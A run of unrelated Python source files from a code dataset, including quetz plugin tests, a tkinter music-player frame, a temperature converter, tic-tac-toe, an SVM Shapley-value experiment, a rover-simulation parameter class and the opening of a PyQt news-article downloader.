the test is async\n async with AsyncClient(app=app, base_url=\"http://test\") as ac:\n response = await ac.post(\n \"/api/jobs\",\n json={\"items_spec\": \"*\", \"manifest\": \"quetz-transmutation:transmutation\"},\n headers={\"x-api-key\": api_key.key},\n )\n\n assert response.status_code == 201\n run_jobs(db)\n new_jobs = run_tasks(db, work_manager)\n await new_jobs[0].wait()\n\n check_status(db)\n\n task = db.query(Task).one()\n db.refresh(task)\n assert task.status == TaskStatus.success\n\n pkgstore = config.get_package_store()\n fileh = pkgstore.serve_path(\n channel_name,\n Path(package_version.platform)\n / package_version.filename.replace(\".tar.bz2\", \".conda\"),\n )\n ok_ = fileh.read(10)\n assert ok_\n\n conda_version = (\n db.query(PackageVersion)\n .filter(PackageVersion.package_format == 'conda')\n .one_or_none()\n )\n\n assert conda_version\n\n # cleanup\n try:\n db.query(PackageVersion).delete()\n db.query(Job).delete()\n db.query(Task).delete()\n finally:\n db.commit()\n\n\n@pytest.mark.parametrize(\n \"spec,n_tasks\",\n [\n (\"my-package==0.1\", 1),\n (\"my-package==0.2\", 0),\n (\"my-package==0.1,my-package==0.2\", 1),\n (\"\", 0),\n (None, 0),\n (\"*\", 1),\n ],\n)\ndef test_package_specs(\n auth_client, db, config, work_manager, package_version, spec, n_tasks\n):\n\n response = auth_client.post(\n \"/api/jobs\",\n json={\"items_spec\": spec, \"manifest\": \"quetz-transmutation:transmutation\"},\n )\n\n assert response.status_code == 201\n run_jobs(db)\n run_tasks(db, work_manager)\n\n check_status(db)\n\n n_created_task = db.query(Task).count()\n\n assert n_created_task == n_tasks\n\n # cleanup\n try:\n db.query(PackageVersion).delete()\n db.query(Job).delete()\n db.query(Task).delete()\n finally:\n db.commit()\n\n\n@pytest.mark.parametrize(\n \"user_role,expected_status\",\n [\n (SERVER_OWNER, 201),\n (SERVER_MAINTAINER, 201),\n (SERVER_USER, 401),\n (SERVER_MEMBER, 401),\n ],\n)\ndef test_permissions(auth_client, db, expected_status):\n\n response = auth_client.post(\n \"/api/jobs\",\n json={\"items_spec\": \"*\", \"manifest\": \"quetz-transmutation:transmutation\"},\n )\n\n assert response.status_code == expected_status\n","sub_path":"plugins/quetz_transmutation/tests/test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":2936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"47310236","text":"from tkinter import ttk\n\nclass FrameBas(ttk.Label):\n\n def __init__(self, parent):\n super().__init__(parent, style=\"Frame.TLabel\")\n self.onzeHeure = parent.onzeHeure\n self.parent = parent\n self.config()\n self.initFrameDuree()\n self.initFrameBoutonsG()\n self.initFrameBoutonsC()\n self.initFrameBoutonsD()\n self.initGrid()\n self.ancienAleatoire = None\n self.ancienRepeat = None\n\n #---------------------------------------------------------------------------\n # Initialisations\n #---------------------------------------------------------------------------\n\n def config(self):\n self.grid(row=2, sticky=\"NEWS\", pady=10)\n self.bind(\"\", self.resizeScale)\n self.scaleDureeLongueur = 0 # Empecher redimentionnement du debut\n self.rowconfigure(0, weight=1)\n self.rowconfigure(1, weight=3)\n self.columnconfigure(0, weight=1)\n self.columnconfigure(1, weight=3)\n self.columnconfigure(2, weight=1)\n\n def initFrameDuree(self):\n self.frameDuree = ttk.Label(self, style=\"Frame.TLabel\")\n self.dureeVar = ttk.Label(self.frameDuree,\n text=\"0:00\", style=\"Default.TLabel\",\n font=(\"Helvetica\", 
10))\n self.scaleDuree = ttk.Scale(self.frameDuree,\n orient=\"horizontal\",\n from_=0.0,\n to=100.0,\n style=\"Default.Horizontal.TScale\",\n length=self.onzeHeure.maxX-112,\n command=self.eventScale)\n self.duree = ttk.Label(self.frameDuree,\n text=\"0:00\", style=\"Default.TLabel\",\n font=(\"Helvetica\", 10))\n self.dureeVar.grid(row=0, column=0, sticky=\"NEWS\")\n self.scaleDuree.grid(row=0, column=1, sticky=\"NEWS\", pady=7)\n self.duree.grid(row=0, column=2, sticky=\"NEWS\")\n self.frameDuree.columnconfigure(0, weight=1)\n self.frameDuree.rowconfigure(0, weight=1)\n\n def initFrameBoutonsG(self):\n self.frameBoutonsG = ttk.Label(self, style=\"Frame.TLabel\")\n self.buttonRepeat = ttk.Button(self.frameBoutonsG,\n text=\"R\", style = \"Default.TButton\",\n command=self.onzeHeure.lecteur.clicRepeat)\n self.buttonAlea = ttk.Button(self.frameBoutonsG,\n text=\"A\", style = \"Default.TButton\",\n command=self.onzeHeure.lecteur.clicAleatoire)\n self.buttonRepeat.grid(row=0, column=0, padx=5)\n self.buttonAlea.grid(row=0, column=1, padx=5)\n\n def initFrameBoutonsC(self):\n self.frameBoutonsC = ttk.Label(self, style=\"Frame.TLabel\")\n self.buttonPrec = ttk.Button(self.frameBoutonsC,\n text=\"|◄\", style = \"Default.TButton\",\n command=lambda : self.onzeHeure.lecteur.musiquePrec())\n self.buttonPause = ttk.Button(self.frameBoutonsC,\n text=\"| |\", style = \"Default.TButton\",\n command=lambda : self.onzeHeure.lecteur.pauseMusique())\n self.buttonPlay = ttk.Button(self.frameBoutonsC,\n text=\"►\", style = \"Default.TButton\",\n command=lambda : self.onzeHeure.lecteur.lireMusique())\n self.buttonSuiv = ttk.Button(self.frameBoutonsC,\n text=\"►|\", style = \"Default.TButton\",\n command=lambda : self.onzeHeure.lecteur.musiqueSuivante())\n self.buttonPrec.grid(row=0, column=0, padx=5)\n self.buttonPause.grid(row=0, column=1, padx=5)\n self.buttonPlay.grid(row=0, column=2, padx=5)\n self.buttonSuiv.grid(row=0, column=3, padx=5)\n\n def initFrameBoutonsD(self):\n self.frameBoutonsD = ttk.Label(self, style=\"Frame.TLabel\")\n self.buttonPlus = ttk.Button(self.frameBoutonsD,\n text=\" + \", style = \"Default.TButton\",\n command=self.clicProprio)\n self.buttonPlaylist = ttk.Button(self.frameBoutonsD,\n text=\"Listes de Lecture\", style = \"Default.TButton\",\n command=lambda : self.parent.frameCentre.afficher(\"FramePlaylist\"))\n self.buttonMusic = ttk.Button(self.frameBoutonsD,\n text=\"Musiques\", style = \"Default.TButton\",\n command=lambda : self.parent.frameCentre.afficher(\"FrameMusic\"))\n self.buttonPlus.grid(row=0, column=0, padx=5)\n self.buttonPlaylist.grid(row=0, column=1, padx=5)\n self.buttonMusic.grid(row=0, column=2, padx=5)\n\n def initGrid(self):\n self.frameDuree.grid(row=0, column=0, columnspan=3)\n self.frameBoutonsG.grid(row=1, column=0)\n self.frameBoutonsC.grid(row=1, column=1)\n self.frameBoutonsD.grid(row=1, column=2)\n\n #---------------------------------------------------------------------------\n # Actualisation\n #---------------------------------------------------------------------------\n\n def actualiserInfos(self):\n self.dureeVar.configure(text=self.onzeHeure.lecteur.getCurDuree(\n convertir=True))\n self.duree.configure(text=self.onzeHeure.lecteur.getDuree(\n convertir=True))\n\n def actualiserCurseur(self, position):\n self.scaleDuree.configure(value=position)\n\n def actualiserAleatoire(self):\n aleatoire = self.onzeHeure.lecteur.aleatoire\n if aleatoire != self.ancienAleatoire:\n self.ancienAleatoire = aleatoire\n if aleatoire: 
self.buttonAlea.configure(style=\"Actif.TButton\")\n else: self.buttonAlea.configure(style=\"Default.TButton\")\n\n def actualiserRepeat(self):\n repeat = self.onzeHeure.lecteur.repeat\n if repeat != self.ancienRepeat:\n self.ancienRepeat = repeat\n if repeat: self.buttonRepeat.configure(style=\"Actif.TButton\")\n else: self.buttonRepeat.configure(style=\"Default.TButton\")\n\n #---------------------------------------------------------------------------\n # Events\n #---------------------------------------------------------------------------\n\n def eventScale(self, event):\n # Appele quand mouvement scale\n self.onzeHeure.lecteur.deplacerCurseur(float(event))\n\n def resizeScale(self, event):\n # Quand changement taille de fenetre, modifier taille barre son\n longDurees = self.dureeVar.winfo_width()+self.duree.winfo_width()+40\n if self.scaleDureeLongueur < 2: self.scaleDureeLongueur += 1\n else: self.scaleDuree.configure(length=event.width-longDurees)\n\n def clicProprio(self):\n frameCentre = self.parent.frameCentre\n if frameCentre.lastFrame != \"FrameProprio\":\n frameCentre.frames[\"FrameProprio\"].actualiserInfos(None,\n musiqueEnCours=True)\n self.parent.frameCentre.afficher(\"FrameProprio\")\n","sub_path":"Frames/FrameBas.py","file_name":"FrameBas.py","file_ext":"py","file_size_in_byte":6616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"586219345","text":"import ui\n\nvalue1 = '0'\nvalue2 = '0'\nflgvalue = 0\n\ndef calc(sender):\n\tinput1 = sender.superview['textfield1'].text\n\tinput2 = sender.superview['textfield2'].text\n\tresult1 = sender.superview['textfield1']\n\tresult2 = sender.superview['textfield2']\n\tglobal value1\n\tglobal value2\n\tglobal flgvalue\n\t\n\tif input1 != value1 or flgvalue == 3:\n\t\tresult2.text = str(round((float(input1) * 1.8 + 32.0),1))\n\t\tvalue1 = input1\n\t\tvalue2 = float(input1) * 1.8 + 32.0\n\t\tflgvalue = 1\n\telif input2 != value2 or flgvalue == 4:\n\t\tresult1.text = str(round(((float(input2) - 32.0) / 1.8),1))\n\t\tvalue1 = (float(input2) - 32.0) / 1.8\n\t\tvalue2 = input2\n\t\tflgvalue = 2\n\ndef exchange(sender):\n\tglobal value1\n\tglobal value2\n\tglobal flgvalue\n\t\n\tif flgvalue == 1:\n\t\texvalue1 = sender.superview['textfield1'].text\n\t\texvalue2 = str(round(((float(exvalue1) - 32.0) / 1.8),1))\n\t\tsender.superview['textfield1'].text = exvalue2\n\t\tsender.superview['textfield2'].text = exvalue1\n\t\tvalue1 = exvalue2\n\t\tflgvalue = 4\n\telif flgvalue == 2:\n\t\texvalue2 = sender.superview['textfield2'].text\n\t\texvalue1 = str(round((float(exvalue2) * 1.8 + 32.0),1))\n\t\tsender.superview['textfield1'].text = exvalue2\n\t\tsender.superview['textfield2'].text = exvalue1\n\t\tvalue2 = exvalue1\n\t\tflgvalue = 3\n\tcalc(sender)\n\nv = ui.load_view()\nif min(ui.get_screen_size()) >= 768:\n\t# iPad\n\tv.frame = (0, 0, 360, 400)\n\tv.present('sheet')\nelse:\n\t# iPhone\n\tv.present(orientations=['portrait'])\n","sub_path":"CFconverter.py","file_name":"CFconverter.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"564182169","text":"def create_level():\n total = 1\n level = []\n success = False\n while not success:\n try:\n dimentions = int(input(\"Input dimension of the board: \"))\n if dimentions < 3:\n print(\"Not a valid dimension\")\n else:\n success = True\n except ValueError:\n print(\"Not a valid dimension\")\n\n for x in range(dimentions):\n temp_list = []\n for y in 
range(dimentions):\n temp_list.append(total)\n total += 1\n \n level.append(temp_list)\n return level\n\ndef update_level(level, player, choice):\n \n for x in level:\n for y in range(len(x)):\n if x[y] == choice:\n x[y] = player\n \n return level\n\ndef draw(level):\n for x in level:\n level_str = \"\"\n for y in x:\n level_str += \"{:>5} \".format(y)\n print(level_str)\n\ndef is_avaliable(choice, level):\n avaliable = False\n\n for x in level:\n for y in range(len(level)):\n if x[y] == choice:\n if x[y] != 'O' or x[y] != 'X':\n avaliable = True\n\n return avaliable\n\ndef get_choice(player, level):\n success = False\n \n while not success:\n try:\n choice = int(input(\"{} position: \".format(player)))\n if is_avaliable(choice, level):\n success = True\n return choice\n else:\n print(\"Illegal move!\")\n except ValueError:\n print(\"Input is not an intiger\")\n\ndef swap_player(player):\n if player == 'X':\n player = 'O'\n else:\n player = 'X'\n\n return player\n\ndef count_down(level, player, limit):\n counter = 0\n for x in range(len(level)):\n if counter == limit:\n return True\n\n counter = 0\n for y in level:\n if y[x] == player:\n counter += 1\n return False\n\ndef count_side(level, player, limit):\n counter = 0\n for x in level:\n if counter == limit:\n return True\n\n counter = 0\n for y in x:\n if y == player:\n counter += 1\n\n return False\n\ndef count_diagoal(level, player, limit):\n counter = 0\n for x in range(len(level)):\n temp_list = level[x]\n if temp_list[x] == player:\n counter += 1\n \n\n if counter == limit:\n return True\n\n else:\n y = 0\n counter = 0\n for x in range(len(level) - 1, -1, -1):\n temp_list = level[y]\n if temp_list[x] == player:\n counter += 1\n y += 1\n if counter == limit:\n return True\n\n return False\ndef is_victory(level, player):\n victory = False\n limit = len(level[1])\n\n if count_down(level, player, limit):\n victory = True\n elif count_side(level, player, limit):\n victory = True\n elif count_diagoal(level, player, limit):\n victory = True\n else:\n victory = False\n\n return victory\n\n\ndef main():\n victory = False\n player = 'O'\n level = create_level()\n remaining_turns = len(level)**2\n resault = \"\"\n\n while not victory:\n\n if remaining_turns > 0:\n \n player = swap_player(player)\n draw(level)\n choice = get_choice(player, level)\n level = update_level(level, player, choice)\n victory = is_victory(level, player)\n if victory:\n resault = \"Winner is: {}\".format(player)\n remaining_turns -= 1\n else:\n resault = \"Draw!\"\n break\n\n draw(level)\n print(resault)\n\n\nmain()","sub_path":"TicTacToe.py","file_name":"TicTacToe.py","file_ext":"py","file_size_in_byte":3665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"563441434","text":"\"\"\"Call gmsh to convert .geo file(s) into .msh, based derivative of MeshParameters\"\"\"\n\n#Standard library\nfrom __future__ import print_function, division #Python 2 compatibility\nimport os\nimport os.path as osp\nfrom subprocess import call\nimport sys\n\n#Site packages\n\n#Local\nimport folderstructure as FS\nimport common\n\n#Path to this code file (for dependency list)\nthisfile=sys.modules[__name__].__file__\n\n#Template for gmsh command\n#arguments: mshfile, geofile, txtfile\ncmd_tmpl=\"gmsh -0 -setstring meshmetafile %s -o %s %s >%s\"\n\nclass GmshRunner(common.ParameterSet):\n \"\"\"Subclass of common.ParameterSet for running gmsh on a .geo file to generate a .msh file and a mesh metadata file\n\n Attributes:\n \n To be read 
in:\n \n - meshname, geomdefname, tmplvalues as for buildgeom.MeshParameters\n \n To be generated by methods:\n \n - geofile = name of .geo file to run (not full path)\n - mshfile = name of output .msh file (not full path)\n - txtfile = name of text file to store gmsh message output (not full path)\n - meshmetafile = name of .yaml file to store mesh metadata\n \"\"\"\n __slots__=('meshname','geomdefname','tmplvalues','geofile','mshfile','txtfile','meshmetafile','_folders')\n _required_attrs=['meshname','geomdefname','tmplvalues']\n _config_attrs=_required_attrs\n #don't need sourcefile as input file due to config\n _inputfile_attrs=['geofile']\n _more_inputfiles=[thisfile,common.__file__]\n _outputfile_attrs=['mshfile','txtfile','meshmetafile']\n _taskname_src_attr='meshname'\n #Remember loaded geometry definitions so we aren't reading the same files over and over when generating multiple meshes\n loaded_geomdefs={}\n\n def __init__(self,**kwd):\n #Initialization from base class\n super(GmshRunner, self).__init__(**kwd)\n #Get folders\n self._folders={'geofile':osp.join(FS.geofolder,self.basename),\n 'mshfile':osp.join(FS.mshfolder,self.basename),\n 'txtfile':osp.join(FS.gmsh_outfolder,self.basename),\n 'meshmetafile':osp.join(FS.meshmeta_outfolder,self.basename)} \n #Get name of input and output files\n self.geofile=self.meshname+'.geo'\n self.mshfile=self.meshname+'.msh'\n self.txtfile=self.meshname+'.txt'\n self.meshmetafile=self.meshname+'.yaml'\n\n def run(self):\n print(self.mshfile)\n #Create directories if necessary\n for oattr in self._outputfile_attrs:\n if not osp.isdir(self._folders[oattr]):\n os.makedirs(self._folders[oattr])\n #Run the shell command\n cmd_str=cmd_tmpl%(self.full_path('meshmetafile'),self.full_path('mshfile'),self.full_path('geofile'),self.full_path('txtfile'))\n call(cmd_str,shell=True)\n #Error if the mesh metadata file was not generated\n assert osp.isfile(self.full_path('meshmetafile')), \"Mesh metadata file %s was not successfully generated.\"%self.full_path('meshmetafile')\n\n#Support command-line arguments\nif __name__ == '__main__':\n program_description='Create gmsh .msh file(s) from .geo file(s) by running gmsh from a yaml input file'\n input_file_description=\"\"\"Path to parameter definition file for the mesh\n This is a potentially multi-doc yaml file, where each document specifies one mesh to generate.\"\"\"\n \n common.run_cmd_line(program_description,input_file_description,GmshRunner)\n","sub_path":"NSF/Tom/src/geom_mk_msh.py","file_name":"geom_mk_msh.py","file_ext":"py","file_size_in_byte":3301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"378214708","text":"import time\nimport random\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom sklearn import svm\nfrom sklearn.preprocessing import Imputer\nfrom sklearn.manifold import TSNE\n\n# (539, 20)\n#加载数据\ndef loadTraindata(str):\n f = open(str, encoding='utf-8')\n sentimentlist = []\n for line in f:\n s = line.replace('?', 'NaN').strip().split(',')\n sentimentlist.append(s)\n f.close()\n dt = np.array(sentimentlist)\n return dt\n\n#预处理训练集\ndef preprocessTrainData(dt):\n train_siz = int (dt.shape[0])\n X = dt[:, 0:19]\n y = dt[:, -1]\n Y = [0 if ((i == 'noband') or (i=='0')) else 1 for i in y]\n\n imp = Imputer(missing_values='NaN', strategy='mean', axis=0)\n imp.fit(X)\n X = imp.transform(X)\n X_train = X[0:train_siz, :]\n Y_train = Y[0:train_siz]\n\n # 随机抽样\n random.seed(5)\n sample_list = random.sample(range(0, train_siz), 
train_siz)\n\n x_t = [X_train[i] for i in sample_list]\n y_t = [Y_train[i] for i in sample_list]\n\n return X_train,Y_train\n\n#预测处理 测试集\ndef preprocessTestData():\n f = open(r'C:\\Users\\smh\\Desktop\\论文\\bands_test.dat', encoding='utf-8')\n sentimentlist = []\n for line in f:\n s = line.replace('?', 'NaN').strip().split(',')\n sentimentlist.append(s)\n f.close()\n dt = np.array(sentimentlist)\n\n X = dt[:, 0:19]\n y = dt[:, -1]\n Y = [0 if i == 'noband' else 1 for i in y]\n\n imp = Imputer(missing_values='NaN', strategy='mean', axis=0)\n imp.fit(X)\n X = imp.transform(X)\n return X,Y\n\n# 预测\ndef predict(x_t,y_t,X_test,Y_test):\n clf = svm.SVC(C=1, kernel='poly', max_iter=4)\n clf.fit(x_t, y_t)\n result = clf.predict(X_test)\n rate = clf.score(X_test, Y_test)\n #print(result)\n #print(Y_test)\n #print(clf.score(X_test, Y_test))\n # result = clf.predict([[40.0,65,0.2,15.0,80,0.625,50,10.4,1640,47.2,42.4,1.0,0.0,3.0,1.5,32.0,40,103.13,100]])\n # print(result)\n return rate\n\n\n# 对样本进行预处理并画图\ndef plot_embedding(data, label, title):\n # \"\"\"\n # :param data:数据集\n # :param label:样本标签\n # :param title:图像标题\n # :return:图像\n # \"\"\"\n x_min, x_max = np.min(data, 0), np.max(data, 0)\n data = (data - x_min) / (x_max - x_min) # 对数据进行归一化处理\n fig = plt.figure() # 创建图形实例\n ax = plt.subplot(111) # 创建子图\n # 遍历所有样本\n print(\"data shape:\",data.shape)\n for i in range(data.shape[0]):\n # 在图中为每个数据点画出标签\n plt.text(data[i, 0], data[i, 1], str(label[i]), color=plt.cm.Set1((label[i]+3) / 10),\n fontdict={'weight': 'bold', 'size': 7})\n plt.xticks() # 指定坐标的刻度\n plt.yticks()\n plt.title(title, fontsize=14)\n # 返回值\n return fig\n\ndef drawPicture(data,label):\n # 画图\n ts = TSNE(n_components=2, init='pca', random_state=0)\n reslut = ts.fit_transform(data)\n # 调用函数,绘制图像\n fig = plot_embedding(reslut, label, 't-SNE Embedding of digits')\n # 显示图像\n plt.show()\n\ndef shapley(a,b,c,ab,ac,bc,abc):\n #a-b-c\n #x1=(a)+(ab-a)+(abc-ab)\n a1 = a\n b1 = ab-a\n c1 = abc-ab\n #a-c-b\n #x2=(a)+(ac-a)+(abc-ac)\n a2 = a\n b2 = ac-a\n c2 = abc-ac\n\n #b-c-a\n #x3=(abc-bc)+(b)+(bc-b)\n a3 = abc-bc\n b3 = b\n c3 = b\n\n #b-a-c\n #x4=(ab-b)+(b)+(abc-ab)\n a4 = ab-b\n b4 = b\n c4 = abc-ab\n\n #c-b-a\n #x5=(abc-bc)+(bc-c)+(c)\n a5 = abc-bc\n b5 = bc-c\n c5 = c\n\n #c-a-b\n #x6=(ac-c)+(abc-ac)+(c)\n a6 = ac-c\n b6 = abc-ac\n c6 = c\n print(\"a1----a6\",a1,a2,a3,a4,a5,a6)\n print(\"b1----b6\",b1,b2,b3,b4,b5,b6)\n print(\"c1----c6\",c1,c2,c3,c4,c5,c6)\n\n A = (a1+a2+a3+a4+a5+a6)/6\n B = (b1+b2+b3+b4+b5+b6)/6\n C = (c1+c2+c3+c4+c5+c6)/6\n\n return A,B,C\n\n#获得训练的准确率\ndef getTrainRate(str):\n dt = loadTraindata(str)\n x_t, y_t = preprocessTrainData(dt)\n X_test, Y_test = preprocessTestData()\n\n result = predict(x_t, y_t, X_test, Y_test)\n #drawPicture(x_t,y_t)\n return result\n\n#对比实验1\ndef radomDate1():\n a = getTrainRate(r'C:\\Users\\smh\\Desktop\\论文\\bands5.dat')\n b = getTrainRate(r'C:\\Users\\smh\\Desktop\\论文\\bands6.dat')\n c = getTrainRate(r'C:\\Users\\smh\\Desktop\\论文\\bands4.dat')\n ab = getTrainRate(r'C:\\Users\\smh\\Desktop\\论文\\bands3.dat')\n ac = getTrainRate(r'C:\\Users\\smh\\Desktop\\论文\\bands7.dat')\n bc = getTrainRate(r'C:\\Users\\smh\\Desktop\\论文\\bands8.dat')\n abc = getTrainRate(r'C:\\Users\\smh\\Desktop\\论文\\bands2.dat')\n print(\"对比实验1:----------------------------\")\n print(\"rate\", a, b, c, ab, ac, bc, abc)\n a, b, c = shapley(a, b, c, ab, ac, bc, abc)\n print('shapley value =', a, b, c)\n\n#对比实验2\ndef radomDate2():\n a = getTrainRate(r'C:\\Users\\smh\\Desktop\\论文datanew\\bandsA.dat')\n b = 
getTrainRate(r'C:\\Users\\smh\\Desktop\\论文datanew\\bandsB.dat')\n c = getTrainRate(r'C:\\Users\\smh\\Desktop\\论文datanew\\bandsC.dat')\n ab = getTrainRate(r'C:\\Users\\smh\\Desktop\\论文datanew\\bandsAB.dat')\n ac = getTrainRate(r'C:\\Users\\smh\\Desktop\\论文datanew\\bandsAC.dat')\n bc = getTrainRate(r'C:\\Users\\smh\\Desktop\\论文datanew\\bandsBC.dat')\n abc = getTrainRate(r'C:\\Users\\smh\\Desktop\\论文datanew\\bandsABC.dat')\n print(\"对比实验2:----------------------------\")\n print(\"rate\", a, b, c, ab, ac, bc, abc)\n a, b, c = shapley(a, b, c, ab, ac, bc, abc)\n print('shapley value =', a, b, c)\n\n\nif __name__ == '__main__':\n time_start = time.time()\n #a = getTrainRate(r'C:\\Users\\smh\\Desktop\\论文datanew\\bandsABC.dat')\n #b = getTrainRate(r'C:\\Users\\smh\\Desktop\\论文datanew\\bandsB.dat')\n #c = getTrainRate(r'C:\\Users\\smh\\Desktop\\论文datanew\\bandsC.dat')\n #radomDate1()\n #radomDate2()\n a, b, c =shapley(0.71, 0.53, 0.42, 0.82, 0.78, 0.64, 0.92)\n print('shapley value =', a, b, c)\n time_end = time.time()\n print('totally cost', time_end - time_start, '秒')\n","sub_path":"classification/svm.py","file_name":"svm.py","file_ext":"py","file_size_in_byte":5977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"199208331","text":"import sys\nsys.path.append(\"../..\")\nimport time\nimport numpy as np\n\nfrom lightenn import neuralnet\nfrom lightenn import types\n\ndef load_training_data(path):\n\n training_x = []\n training_y = []\n\n with open(path, 'r') as f:\n for line in f:\n line = line.strip()\n if len(line) == 0:\n continue\n t = line.split(',')\n training_x.append(t[0:len(t)-1])\n training_y.append(t[len(t)-1:len(t)])\n\n assert (len(training_x) > 0), 'Error: empty training set.'\n\n return (np.array(training_x, dtype=np.float),\n np.array(training_y, dtype=np.float))\n\ndef split_validation(training_x, training_y, val_perc):\n split_idx = int((1.0-val_perc)*len(training_x))\n return (training_x[0:split_idx], training_y[0:split_idx],\n training_x[split_idx:len(training_x)], training_y[split_idx:len(training_y)])\n\n# Hyperparams\nnum_epochs = 10\nlearning_rate = 1.0\n\n# For selecting random weights and biases\nmu = 0.0\nstddev = 1.0\n\n# Percentage of validation data\nval_perc = 0.2\n\n# Load training and validation sets\ntraining_x, training_y = load_training_data('./data/xor_data.csv')\ntraining_x, training_y, validation_x, validation_y = split_validation(training_x, training_y, val_perc)\n\n# Stabilize randomness\nnp.random.seed(123)\n\n# Build neural net\nnn = neuralnet.NeuralNet()\nnn.add_input(2)\nnn.add_fully_connected(3, activation_type=types.ActivationType.SIGMOID)\nnn.add_output(1, activation_type=types.ActivationType.SIGMOID)\nnn.initialize(loss_type=types.LossType.CROSS_ENTROPY, learning_rate=learning_rate, mu=mu, stddev=stddev)\n\n# Numerical gradient check\nnn.check_gradients(delta=0.00001)\n\n# Train in SGD mode\nt_0 = time.time()\nnn.train_sgd((training_x, training_y), num_epochs, validation_set=(validation_x, validation_y))\nt_1 = time.time()\ntot_time = round(t_1 - t_0, 2)\nprint('Total time (in seconds):', tot_time)\n\n# Predict. 
Remember that the output logit is a sigmoid - we must round\n# to get the prediction value\nprint('0 XOR 0:', np.round(nn.predict(np.array([[0,0]], dtype=np.float))))\nprint('0 XOR 1:', np.round(nn.predict(np.array([[0,1]], dtype=np.float))))\nprint('1 XOR 0:', np.round(nn.predict(np.array([[1,0]], dtype=np.float))))\nprint('1 XOR 1:', np.round(nn.predict(np.array([[1,1]], dtype=np.float))))\n\n# Batch-predict several inputs at once.\nprint(np.round(nn.predict(np.array([[0, 0], [0, 1], [1, 0], [1, 1]], dtype=np.float))))\n","sub_path":"usage_examples/toy_examples/logical_xor.py","file_name":"logical_xor.py","file_ext":"py","file_size_in_byte":2434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"634757400","text":"#!/usr/bin/Python3\n\nimport math\n\nclass parameter:\n\n # Define all parameters needed in code\n # Rover Parameters\n n_rovers = 12 # Number of Rovers in Simulation\n n_poi = 10 # Number of POIs on map\n rover_vel = 1.0 # Rover velocity in units/s\n\n # Domain parameters\n x_dim = 30 # X dimension of map\n y_dim = 30 # Y dimension of map\n obs_rad = 100 # How far away POIs can be detected (high number is full observability)\n coupling = 3 # Number of agents needed to view a POI for reward\n act_dist = 4 # Range at which rovers can sucessfully observe POI\n angle_res = 90 # Angle resolution determines numbr of quadrants for sensors 360/Angle\n pd_scale = 0.8 # Multiplier for minimum distance POIs must be from each other\n rv_scale = 1.5 # Multiplier for minimum distance POIs must be from nearest rover\n max_p_val = 5 # Maximum value a POI can be\n\n # Neural Network Parameters\n n_inputs = 8 # Number of NN inputs\n n_outputs = 2 # Number of NN outputs\n n_hidden = 9 # Number of nodes in hidden layer\n\n # CCEA Parameters\n epsilon = 0.9 # For epsilon greedy parent selection\n pop_size = 20 # Size of each population in CCEA\n p_mut = 0.1 # Probability of mutation occuring\n percent_mut = 0.1 # Percentage of bits in policy which are mutated\n n_bits = math.floor(math.log(100, 2)) + 1 + 1 # The number of bits needed to express a single weight\n # The extra bit is used to determine if a weight is negative or positive\n\n # Simulation Parameters\n reward_id = 2 # 0 for global, 1 for difference, 2 for D++\n use_coords = True # True means import rover and poi positions from txt file, False means make new txt file\n generations = 1000 # Number of evolutionary generations\n n_time_steps = 30 # Number of time steps agents can move for policy evals (each time step is 1 s)\n stat_runs = 10 # Number of statistical runs\n asserts_on = False # Turns assert statements on (True) or off (False)\n graphs_on = False # Turns graphs on (True) or off (False)\n\n # Visualizer\n scale_factor = 30\n visualizer_on = False # Turns visualizer on (True) or off (False)\n trail_on = True # path trail for all the agents\n visualize_only_last_generation = True # Visualizes only last generation's if True, else every Generation\n save_episode = True # this saves the last generation's performance images\n","sub_path":"parameters.py","file_name":"parameters.py","file_ext":"py","file_size_in_byte":2383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"409523883","text":"\"\"\"\nCreated on Mon Jul 20 14:06:36 2020\n\n@author: tfinney\n\nmain file for read the bee for free!\n\"\"\"\n\n\n# from fbs_runtime.application_context.PyQt5 import ApplicationContext\n# from PyQt5.QtWidgets import QMainWindow\n\n# import 
sys\n\n\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import QDateTime, Qt, QTimer, pyqtSlot\nfrom PyQt5 import QtGui\nimport os\nimport string\nimport random\nimport urllib.request\nimport webbrowser\nimport glob\nimport platform\nimport subprocess\nimport sys\nimport shutil\n\nimport fetch_news as fn\n\nclass mainWindow(QMainWindow):\n def __init__(self, *args, **kwargs):\n super(mainWindow, self).__init__(*args, **kwargs)\n \n self.statusBar = QStatusBar()\n self.setStatusBar(self.statusBar)\n self.statusBar.showMessage('Normal')\n self.initial_setup()\n \n self.setWindowTitle('Read the Bee for Free!')\n self.center()\n self.setMinimumSize(500,100)\n \n testLabel = QLabel('Read The Bee For Free!') \n \n self.urlLine = QLineEdit('')\n self.urlLine.setPlaceholderText('enter a url...')\n self.urlLine.setDragEnabled(True)\n self.urlLine.setToolTip('Enter the url of the news article you want to read.')\n \n urlButton = QPushButton('Download')\n urlButton.setToolTip('Download the article to the data directory.')\n \n viewButton = QPushButton('Download and Read') \n viewButton.setToolTip('Download the article and open it in the default web browser.')\n\n deleteButton = QPushButton('Delete Local Data')\n deleteButton.setToolTip('Delete the local html files created by the program.')\n \n openFolderButton = QPushButton('Open Data Directory')\n openFolderButton.setToolTip('Opens the folder on your machine where we are downloading things!')\n \n clear_url_button = QPushButton('Clear')\n clear_url_button.setToolTip('clear the current url')\n\n mainLayout = QVBoxLayout() \n \n urlLayout = QHBoxLayout()\n # urlLayout.addWidget(urlLabel)\n urlLayout.addWidget(self.urlLine)\n urlLayout.addWidget(clear_url_button)\n \n buttonLayout = QHBoxLayout()\n buttonLayout.addWidget(urlButton)\n buttonLayout.addWidget(viewButton)\n buttonLayout.addWidget(deleteButton)\n \n bottomButtonLayout = QHBoxLayout()\n bottomButtonLayout.addWidget(openFolderButton)\n 